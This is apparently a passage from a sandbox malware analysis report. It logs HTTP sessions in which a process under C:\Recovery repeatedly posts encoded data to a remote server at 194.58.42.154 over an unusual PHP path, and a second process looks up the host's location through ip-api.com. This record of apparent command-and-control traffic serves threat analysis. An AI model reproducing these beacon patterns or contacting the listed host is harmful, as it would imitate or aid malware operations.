Aug 1, 2024 04:27:53.393539906 CEST	1532	OUT	Data Raw: 58 52 5c 5e 5a 40 52 58 5e 5a 5a 56 50 5b 50 5e 55 5e 5c 5f 54 5d 5a 5c 59 52 58 51 55 5c 5a 5b 43 5e 53 59 5d 5b 56 5c 5e 5d 52 53 55 50 55 42 5a 5c 5f 52 47 58 59 50 58 5e 50 53 50 51 5b 44 5b 5f 41 5c 5f 5e 55 53 58 5e 5a 5a 47 5d 42 5d 59 58 Data Ascii: XR\^Z@RX^ZZVP[P^U^\_T]Z\YRXQU\Z[C^SY][V\^]RSUPUBZ\_RGXYPX^PSPQ[D[_A\_^USX^ZZG]B]YXV[S_X^^WT_]PUQQZXVWY__Z_G\^^DU]Y^[YY[Q^YT\ZUYVP^_WXS[YFT_[Z[Z_U[U_U\TYX__^U]QSYWY_WX[PPYQ]]ZY_[Y_PC^]^%[+R 7)=*?2"'\+Z%-##+)5Y '9^/.]+7
Aug 1, 2024 04:27:53.837814093 CEST	25	IN	HTTP/1.1 100 Continue
Aug 1, 2024 04:27:53.968586922 CEST	324	IN	HTTP/1.1 200 OK Date: Thu, 01 Aug 2024 02:27:53 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 152 Content-Type: text/html; charset=UTF-8 Data Raw: 0e 1e 26 55 36 25 31 12 34 10 33 0a 3a 14 07 02 3f 55 21 05 29 3c 28 1e 30 0d 28 0a 28 3d 3c 58 3d 06 28 1f 31 3e 30 12 20 3c 0c 0e 3f 1c 2a 46 0c 10 25 5f 3c 03 3b 1e 25 01 23 51 2e 0e 0c 1b 27 2e 28 00 22 2c 36 18 37 05 27 00 28 01 20 50 25 39 27 0b 3a 3d 3a 5f 25 34 2e 5d 23 1f 2a 54 02 15 27 19 2a 3e 35 1d 24 32 12 14 26 2c 1a 0b 25 58 3d 10 21 2f 31 59 20 17 3d 03 27 38 09 56 3c 3d 3c 57 25 3f 05 01 3d 21 2d 51 35 17 20 50 2a 01 2c 57 00 35 57 54 Data Ascii: &U6%143:?U!)<(0((=<X=(1>0 <?F%_<;%#Q.'.(",67'( P%9':=:_%4.]#T'>5$2&,%X=!/1Y ='8V<=<W%?=!-Q5 P,W5WT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49743	194.58.42.154	80	7860	C:\Recovery\HpQPPZazcv.exe

Timestamp	Bytes transferred	Direction	Data
Aug 1, 2024 04:27:59.877945900 CEST	502	OUT	POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 194.58.42.154 Content-Length: 1552 Expect: 100-continue Connection: Keep-Alive
Aug 1, 2024 04:28:00.247396946 CEST	1552	OUT	Data Raw: 5d 51 5c 50 5f 45 57 52 5e 5a 5a 56 50 5a 50 5b 55 54 5c 50 54 5b 5a 50 59 52 58 51 55 5c 5a 5b 43 5e 53 59 5d 5b 56 5c 5e 5d 52 53 55 50 55 42 5a 5c 5f 52 47 58 59 50 58 5e 50 53 50 51 5b 44 5b 5f 41 5c 5f 5e 55 53 58 5e 5a 5a 47 5d 42 5d 59 58 Data Ascii: ]Q\P_EWR^ZZVPZP[UT\PT[ZPYRXQU\Z[C^SY][V\^]RSUPUBZ\_RGXYPX^PSPQ[D[_A\_^USX^ZZG]B]YXV[S_X^^WT_]PUQQZXVWY__Z_G\^^DU]Y^[YY[Q^YT\ZUYVP^_WXS[YFT_[Z[Z_U[U_U\TYX__^U]QSYWY_WX[PPYQ]]ZY_[Y_PC^]^%_)3!<X)0>=<!Q!(/\+8 $=&#<+: ^$9^/.]+3
Aug 1, 2024 04:28:00.689836025 CEST	25	IN	HTTP/1.1 100 Continue
Aug 1, 2024 04:28:00.825644970 CEST	380	IN	HTTP/1.1 200 OK Date: Thu, 01 Aug 2024 02:28:00 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 152 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 0e 1e 26 55 35 18 03 5a 34 00 2b 0e 2d 3a 39 00 3f 1d 2a 5b 29 05 3c 5d 27 1d 05 1f 28 13 27 00 3d 01 20 5b 31 00 01 0c 20 2f 2e 0d 28 26 2a 46 0c 10 26 07 2b 2d 0d 56 32 11 01 1d 39 20 26 1a 25 2d 3f 5a 35 3f 29 0b 37 3b 33 01 28 38 24 51 27 29 3c 57 2e 00 08 59 31 37 00 10 23 0f 2a 54 02 15 27 57 2a 2d 2e 02 24 0c 23 04 25 2c 23 54 31 2e 2e 07 21 3c 3d 13 20 07 36 5b 33 28 06 0a 3c 2e 0a 19 31 3c 24 59 2a 31 36 0a 36 07 20 50 2a 01 2c 57 00 35 57 54 Data Ascii: &U5Z4+-:9?[)<]'('= [1 /.(&F&+-V29 &%-?Z5?)7;3(8$Q')<W.Y17#T'W-.$#%,#T1..!<= 6[3(<.1<$Y166 P,W5WT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49744	208.95.112.1	80	6828	C:\ProgramData\Microsoft\based.exe

Timestamp	Bytes transferred	Direction	Data
Aug 1, 2024 04:28:05.803774118 CEST	116	OUT	GET /json/?fields=225545 HTTP/1.1 Host: ip-api.com Accept-Encoding: identity User-Agent: python-urllib3/2.2.2
Aug 1, 2024 04:28:07.273669004 CEST	379	IN	HTTP/1.1 200 OK Date: Thu, 01 Aug 2024 02:28:05 GMT Content-Type: application/json; charset=utf-8 Content-Length: 202 Access-Control-Allow-Origin: * X-Ttl: 60 X-Rl: 44 Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 72 65 76 65 72 73 65 22 3a 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 33 33 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 22 6d 6f 62 69 6c 65 22 3a 66 61 6c 73 65 2c 22 70 72 6f 78 79 22 3a 66 61 6c 73 65 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 7d Data Ascii: {"status":"success","country":"United States","regionName":"New York","timezone":"America/New_York","reverse":"static-cpe-8-46-123-33.centurylink.com","mobile":false,"proxy":false,"query":"8.46.123.33"}
Aug 1, 2024 04:28:07.274243116 CEST	379	IN	HTTP/1.1 200 OK Date: Thu, 01 Aug 2024 02:28:05 GMT Content-Type: application/json; charset=utf-8 Content-Length: 202 Access-Control-Allow-Origin: * X-Ttl: 60 X-Rl: 44 Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 72 65 76 65 72 73 65 22 3a 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 33 33 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 22 6d 6f 62 69 6c 65 22 3a 66 61 6c 73 65 2c 22 70 72 6f 78 79 22 3a 66 61 6c 73 65 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 7d Data Ascii: {"status":"success","country":"United States","regionName":"New York","timezone":"America/New_York","reverse":"static-cpe-8-46-123-33.centurylink.com","mobile":false,"proxy":false,"query":"8.46.123.33"}
Aug 1, 2024 04:28:07.274915934 CEST	379	IN	HTTP/1.1 200 OK Date: Thu, 01 Aug 2024 02:28:05 GMT Content-Type: application/json; charset=utf-8 Content-Length: 202 Access-Control-Allow-Origin: * X-Ttl: 60 X-Rl: 44 Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 72 65 76 65 72 73 65 22 3a 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 33 33 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 22 6d 6f 62 69 6c 65 22 3a 66 61 6c 73 65 2c 22 70 72 6f 78 79 22 3a 66 61 6c 73 65 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 7d Data Ascii: {"status":"success","country":"United States","regionName":"New York","timezone":"America/New_York","reverse":"static-cpe-8-46-123-33.centurylink.com","mobile":false,"proxy":false,"query":"8.46.123.33"}
Aug 1, 2024 04:28:07.275859118 CEST	379	IN	HTTP/1.1 200 OK Date: Thu, 01 Aug 2024 02:28:05 GMT Content-Type: application/json; charset=utf-8 Content-Length: 202 Access-Control-Allow-Origin: * X-Ttl: 60 X-Rl: 44 Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 72 65 76 65 72 73 65 22 3a 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 33 33 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 22 6d 6f 62 69 6c 65 22 3a 66 61 6c 73 65 2c 22 70 72 6f 78 79 22 3a 66 61 6c 73 65 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 7d Data Ascii: {"status":"success","country":"United States","regionName":"New York","timezone":"America/New_York","reverse":"static-cpe-8-46-123-33.centurylink.com","mobile":false,"proxy":false,"query":"8.46.123.33"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49745	194.58.42.154	80	7860	C:\Recovery\HpQPPZazcv.exe

Timestamp	Bytes transferred	Direction	Data
Aug 1, 2024 04:28:05.948719978 CEST	478	OUT	POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 194.58.42.154 Content-Length: 2512 Expect: 100-continue
Aug 1, 2024 04:28:06.314574003 CEST	2512	OUT	Data Raw: 58 53 5c 5f 5f 46 57 5d 5e 5a 5a 56 50 5f 50 50 55 57 5c 5b 54 5e 5a 59 59 52 58 51 55 5c 5a 5b 43 5e 53 59 5d 5b 56 5c 5e 5d 52 53 55 50 55 42 5a 5c 5f 52 47 58 59 50 58 5e 50 53 50 51 5b 44 5b 5f 41 5c 5f 5e 55 53 58 5e 5a 5a 47 5d 42 5d 59 58 Data Ascii: XS\__FW]^ZZVP_PPUW\[T^ZYYRXQU\Z[C^SY][V\^]RSUPUBZ\_RGXYPX^PSPQ[D[_A\_^USX^ZZG]B]YXV[S_X^^WT_]PUQQZXVWY__Z_G\^^DU]Y^[YY[Q^YT\ZUYVP^_WXS[YFT_[Z[Z_U[U_U\TYX__^U]QSYWY_WX[PPYQ]]ZY_[Y_PC^]^%[(U*7Z'>#)?)V#;/<;00&70?5Z7+39^/.]+'
Aug 1, 2024 04:28:06.627830982 CEST	1236	OUT	Data Raw: 58 53 5c 5f 5f 46 57 5d 5e 5a 5a 56 50 5f 50 50 55 57 5c 5b 54 5e 5a 59 59 52 58 51 55 5c 5a 5b 43 5e 53 59 5d 5b 56 5c 5e 5d 52 53 55 50 55 42 5a 5c 5f 52 47 58 59 50 58 5e 50 53 50 51 5b 44 5b 5f 41 5c 5f 5e 55 53 58 5e 5a 5a 47 5d 42 5d 59 58 Data Ascii: XS\__FW]^ZZVP_PPUW\[T^ZYYRXQU\Z[C^SY][V\^]RSUPUBZ\_RGXYPX^PSPQ[D[_A\_^USX^ZZG]B]YXV[S_X^^WT_]PUQQZXVWY__Z_G\^^DU]Y^[YY[Q^YT\ZUYVP^_WXS[YFT_[Z[Z_U[U_U\TYX__^U]QSYWY_WX[PPYQ]]ZY_[Y_PC^]^%[(U*7Z'>#)?)V#;/<;00&70?5Z7+39^/.]+'
Aug 1, 2024 04:28:07.274805069 CEST	25	IN	HTTP/1.1 100 Continue
Aug 1, 2024 04:28:07.275496006 CEST	25	IN	HTTP/1.1 100 Continue
Aug 1, 2024 04:28:07.275804996 CEST	25	IN	HTTP/1.1 100 Continue
Aug 1, 2024 04:28:07.278924942 CEST	40	OUT	Data Raw: 30 3f 17 19 0f 3f 2c 50 0b 2f 27 3c 22 03 1b 1c 39 3f 25 5e 2b 0b 1c 3e 3d 02 3b 26 12 0d 2a 56 2e 06 51 5c 0a 3e 57 51 Data Ascii: 0??,P/'<"9?%^+>=;&*V.Q\>WQ
Aug 1, 2024 04:28:07.730700970 CEST	151	IN	HTTP/1.1 200 OK Date: Thu, 01 Aug 2024 02:28:06 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 56 5f 5a Data Ascii: <V_Z

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49746	194.58.42.154	80	7860	C:\Recovery\HpQPPZazcv.exe

Timestamp	Bytes transferred	Direction	Data
Aug 1, 2024 04:28:06.202893019 CEST	478	OUT	POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 194.58.42.154 Content-Length: 1972 Expect: 100-continue
Aug 1, 2024 04:28:06.550543070 CEST	1972	OUT	Data Raw: 5d 53 5c 52 5a 47 57 5c 5e 5a 5a 56 50 5f 50 5b 55 5f 5c 5e 54 5d 5a 51 59 52 58 51 55 5c 5a 5b 43 5e 53 59 5d 5b 56 5c 5e 5d 52 53 55 50 55 42 5a 5c 5f 52 47 58 59 50 58 5e 50 53 50 51 5b 44 5b 5f 41 5c 5f 5e 55 53 58 5e 5a 5a 47 5d 42 5d 59 58 Data Ascii: ]S\RZGW\^ZZVP_P[U_\^T]ZQYRXQU\Z[C^SY][V\^]RSUPUBZ\_RGXYPX^PSPQ[D[_A\_^USX^ZZG]B]YXV[S_X^^WT_]PUQQZXVWY__Z_G\^^DU]Y^[YY[Q^YT\ZUYVP^_WXS[YFT_[Z[Z_U[U_U\TYX__^U]QSYWY_WX[PPYQ]]ZY_[Y_PC^]^%X?0=S#/+)U"]*5"],<;3[=Q7.)9)"4$_'=9^/.]+'
Aug 1, 2024 04:28:06.627587080 CEST	1236	OUT	Data Raw: 09 34 23 58 38 39 49 09 09 38 16 1d 33 07 20 18 03 3c 5b 1a 35 3a 5c 25 0b 37 0e 00 3c 39 26 20 25 30 21 2e 39 1c 3e 21 3f 3f 5c 1c 3a 38 07 3e 02 30 3d 20 33 3f 0d 25 38 56 1e 13 31 04 19 3e 13 2e 09 19 09 58 09 34 08 3d 08 1f 35 32 17 3f 0d 04 Data Ascii: 4#X89I83 <[5:\%7<9& %0!.9>!??\:8>0= 3?%8V1>.X4=52?%!(<.W60!G%=89<-<<%"(X=6=1!+#0"$V1[$9-!9><]!=:89+ZX7Y:0?9U>,)59)X3<+V"1%1?,1-2: -Z>>50(<-$115?:$*_
Aug 1, 2024 04:28:07.127603054 CEST	1236	OUT	Data Raw: 5d 53 5c 52 5a 47 57 5c 5e 5a 5a 56 50 5f 50 5b 55 5f 5c 5e 54 5d 5a 51 59 52 58 51 55 5c 5a 5b 43 5e 53 59 5d 5b 56 5c 5e 5d 52 53 55 50 55 42 5a 5c 5f 52 47 58 59 50 58 5e 50 53 50 51 5b 44 5b 5f 41 5c 5f 5e 55 53 58 5e 5a 5a 47 5d 42 5d 59 58 Data Ascii: ]S\RZGW\^ZZVP_P[U_\^T]ZQYRXQU\Z[C^SY][V\^]RSUPUBZ\_RGXYPX^PSPQ[D[_A\_^USX^ZZG]B]YXV[S_X^^WT_]PUQQZXVWY__Z_G\^^DU]Y^[YY[Q^YT\ZUYVP^_WXS[YFT_[Z[Z_U[U_U\TYX__^U]QSYWY_WX[PPYQ]]ZY_[Y_PC^]^%X?0=S#/+)U"]*5"],<;3[=Q7.)9)"4$_'=9^/.]+'
Aug 1, 2024 04:28:07.275549889 CEST	25	IN	HTTP/1.1 100 Continue
Aug 1, 2024 04:28:07.275887966 CEST	25	IN	HTTP/1.1 100 Continue
Aug 1, 2024 04:28:07.440947056 CEST	25	IN	HTTP/1.1 100 Continue
Aug 1, 2024 04:28:07.549725056 CEST	324	IN	HTTP/1.1 200 OK Date: Thu, 01 Aug 2024 02:28:06 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 152 Content-Type: text/html; charset=UTF-8 Data Raw: 0e 1e 26 1f 22 40 2d 11 37 07 3f 0d 2c 3a 32 58 3f 0d 3a 58 28 2f 2c 59 33 33 2b 54 29 2e 24 59 3d 06 37 03 26 00 34 51 20 5a 35 57 28 0c 2a 46 0c 10 26 06 3f 2d 0d 55 32 3f 2b 57 2d 0e 32 1a 26 3e 33 5f 22 3f 2e 19 20 28 33 00 3e 28 1a 57 30 29 30 1a 2d 2e 3e 58 32 27 32 11 37 1f 2a 54 02 15 27 50 29 2e 3a 00 33 32 19 06 27 2f 23 10 31 3e 29 5f 22 05 2e 04 23 07 29 05 24 38 0e 0f 3f 58 3f 0b 24 3c 37 03 2a 22 21 51 21 17 20 50 2a 01 2c 57 00 35 57 54 Data Ascii: &"@-7?,:2X?:X(/,Y33+T).$Y=7&4Q Z5W(F&?-U2?+W-2&>3_"?. (3>(W0)0-.>X2'27T'P).:32'/#1>)_".#)$8?X?$<7"!Q! P,W5WT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49749	194.58.42.154	80	7860	C:\Recovery\HpQPPZazcv.exe

Timestamp	Bytes transferred	Direction	Data
Aug 1, 2024 04:28:13.121543884 CEST	478	OUT	POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 194.58.42.154 Content-Length: 1972 Expect: 100-continue
Aug 1, 2024 04:28:13.475258112 CEST	1972	OUT	Data Raw: 5d 53 59 54 5f 45 52 5a 5e 5a 5a 56 50 59 50 58 55 56 5c 58 54 50 5a 5d 59 52 58 51 55 5c 5a 5b 43 5e 53 59 5d 5b 56 5c 5e 5d 52 53 55 50 55 42 5a 5c 5f 52 47 58 59 50 58 5e 50 53 50 51 5b 44 5b 5f 41 5c 5f 5e 55 53 58 5e 5a 5a 47 5d 42 5d 59 58 Data Ascii: ]SYT_ERZ^ZZVPYPXUV\XTPZ]YRXQU\Z[C^SY][V\^]RSUPUBZ\_RGXYPX^PSPQ[D[_A\_^USX^ZZG]B]YXV[S_X^^WT_]PUQQZXVWY__Z_G\^^DU]Y^[YY[Q^YT\ZUYVP^_WXS[YFT_[Z[Z_U[U_U\TYX__^U]QSYWY_WX[PPYQ]]ZY_[Y_PC^]^%<3: /+* 9(/1V!'Y<'$>)P4X3+. $9^/.]+
Aug 1, 2024 04:28:13.925272942 CEST	25	IN	HTTP/1.1 100 Continue
Aug 1, 2024 04:28:14.057415009 CEST	324	IN	HTTP/1.1 200 OK Date: Thu, 01 Aug 2024 02:28:13 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 152 Content-Type: text/html; charset=UTF-8 Data Raw: 0e 1e 26 52 36 1f 29 5b 34 00 0d 0b 2d 2a 35 05 3f 0d 26 10 3d 02 30 10 24 30 23 52 29 3d 3c 1f 29 06 3c 5c 31 3e 24 12 34 02 35 1f 3c 36 2a 46 0c 10 26 02 3c 3d 2b 1e 26 01 28 0e 2c 20 32 18 31 10 3b 5f 22 3f 0f 0c 37 15 3f 04 3c 06 20 56 24 29 3c 15 2d 2d 2e 16 26 0e 22 11 23 0f 2a 54 02 15 27 51 3d 3d 2a 03 33 0b 24 5d 26 3c 37 1f 24 2d 21 5f 36 02 00 04 20 39 2e 5d 24 38 0d 1a 3f 3e 02 51 25 3c 38 13 3d 22 26 0f 21 07 20 50 2a 01 2c 57 00 35 57 54 Data Ascii: &R6)[4-5?&=0$0#R)=<)<\1>$45<6F&<=+&(, 21;_"?7?< V$)<--.&"#T'Q==3$]&<7$-!_6 9.]$8?>Q%<8="&! P*,W5WT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49750	194.58.42.154	80	7860	C:\Recovery\HpQPPZazcv.exe

Timestamp	Bytes transferred	Direction	Data
Aug 1, 2024 04:28:18.950993061 CEST	502	OUT	POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 194.58.42.154 Content-Length: 2504 Expect: 100-continue Connection: Keep-Alive
Aug 1, 2024 04:28:19.741637945 CEST	25	IN	HTTP/1.1 100 Continue
Aug 1, 2024 04:28:19.956641912 CEST	25	IN	HTTP/1.1 100 Continue
Aug 1, 2024 04:28:20.653506994 CEST	2504	OUT	Data Raw: 5d 52 5c 50 5f 47 57 5a 5e 5a 5a 56 50 5e 50 5c 55 51 5c 5a 54 5a 5a 5d 59 52 58 51 55 5c 5a 5b 43 5e 53 59 5d 5b 56 5c 5e 5d 52 53 55 50 55 42 5a 5c 5f 52 47 58 59 50 58 5e 50 53 50 51 5b 44 5b 5f 41 5c 5f 5e 55 53 58 5e 5a 5a 47 5d 42 5d 59 58 Data Ascii: ]R\P_GWZ^ZZVP^P\UQ\ZTZZ]YRXQU\Z[C^SY][V\^]RSUPUBZ\_RGXYPX^PSPQ[D[_A\_^USX^ZZG]B]YXV[S_X^^WT_]PUQQZXVWY__Z_G\^^DU]Y^[YY[Q^YT\ZUYVP^_WXS[YFT_[Z[Z_U[U_U\TYX__^U]QSYWY_WX[PPYQ]]ZY_[Y_PC^]^&<#=4(-!+0?,'*#$U(9577'9^/.]+7
Aug 1, 2024 04:28:20.925170898 CEST	207	IN	HTTP/1.1 200 OK Date: Thu, 01 Aug 2024 02:28:19 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 3c 56 5f 5a Data Ascii: <V_Z
Aug 1, 2024 04:28:21.140621901 CEST	207	IN	HTTP/1.1 200 OK Date: Thu, 01 Aug 2024 02:28:19 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 3c 56 5f 5a Data Ascii: <V_Z

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49751	194.58.42.154	80	7860	C:\Recovery\HpQPPZazcv.exe

Timestamp	Bytes transferred	Direction	Data
Aug 1, 2024 04:28:20.849490881 CEST	502	OUT	POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 194.58.42.154 Content-Length: 1972 Expect: 100-continue Connection: Keep-Alive
Aug 1, 2024 04:28:21.206998110 CEST	1972	OUT	Data Raw: 58 5f 5c 56 5f 43 52 58 5e 5a 5a 56 50 58 50 51 55 53 5c 58 54 5b 5a 51 59 52 58 51 55 5c 5a 5b 43 5e 53 59 5d 5b 56 5c 5e 5d 52 53 55 50 55 42 5a 5c 5f 52 47 58 59 50 58 5e 50 53 50 51 5b 44 5b 5f 41 5c 5f 5e 55 53 58 5e 5a 5a 47 5d 42 5d 59 58 Data Ascii: X_\V_CRX^ZZVPXPQUS\XT[ZQYRXQU\Z[C^SY][V\^]RSUPUBZ\_RGXYPX^PSPQ[D[_A\_^USX^ZZG]B]YXV[S_X^^WT_]PUQQZXVWY__Z_G\^^DU]Y^[YY[Q^YT\ZUYVP^_WXS[YFT_[Z[Z_U[U_U\TYX__^U]QSYWY_WX[PPYQ]]ZY_[Y_PC^]^&(#U!<4_=09,!+?];$.*7.+! '39^/.]+;
Aug 1, 2024 04:28:21.651439905 CEST	25	IN	HTTP/1.1 100 Continue
Aug 1, 2024 04:28:21.793061972 CEST	380	IN	HTTP/1.1 200 OK Date: Thu, 01 Aug 2024 02:28:21 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 152 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 0e 1e 26 1d 22 35 29 11 37 2e 0a 56 2e 29 2a 5d 3f 0a 36 11 29 3c 2c 11 33 1d 2b 1f 3f 5b 30 10 3e 2c 20 11 25 2e 34 57 23 2f 32 0f 28 0c 2a 46 0c 10 26 06 28 3d 3c 08 26 2c 3f 1d 2c 20 21 42 26 00 34 00 21 59 2d 09 37 3b 0e 5f 3c 38 1a 51 30 39 30 53 3a 00 3a 5c 27 34 31 05 34 35 2a 54 02 15 24 09 29 3d 3a 07 30 32 1a 14 31 02 11 1f 31 00 39 59 36 5a 21 5a 37 39 26 17 30 38 38 08 3c 2e 38 52 32 06 37 06 29 31 07 57 22 3d 20 50 2a 01 2c 57 00 35 57 54 Data Ascii: &"5)7.V.)]?6)<,3+?[0>, %.4W#/2(F&(=<&,?, !B&4!Y-7;_<8Q090S::\'4145T$)=:02119Y6Z!Z79&088<.8R27)1W"= P,W5WT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49752	194.58.42.154	80	7860	C:\Recovery\HpQPPZazcv.exe

Timestamp	Bytes transferred	Direction	Data
Aug 1, 2024 04:28:21.328598976 CEST	502	OUT	POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 194.58.42.154 Content-Length: 2512 Expect: 100-continue Connection: Keep-Alive
